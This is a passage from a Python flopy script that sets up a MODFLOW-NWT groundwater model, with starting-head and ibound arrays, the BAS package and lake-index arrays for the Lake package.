210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0]
ibnd1 = np.array(ibnd1)
ibnd2 = np.array(ibnd2)
ibnd3 = np.array(ibnd3)
ibnd1 = ibnd1.reshape(top1.shape)
ibnd2 = ibnd2.reshape(top1.shape)
ibnd3 = ibnd3.reshape(top1.shape)
ibnd = [ibnd1, ibnd2, ibnd3]
ibnd = np.array(ibnd)
sthd1 = np.array(sthd1)
sthd1 = sthd1.reshape(top1.shape)
sthd2 = np.ones(top1.shape) * 210.
sthd3 = sthd2.copy()
sthd = [sthd1, sthd2, sthd3]
sthd = np.array(sthd)
hdry = -9999
bas = flopy.modflow.ModflowBas(mf, ibound=ibnd, hnoflo=hdry, strt=sthd)
## Instantiate Lake (LAK) package for MODFLOW-NWT
lkarr1 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
lkarr2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
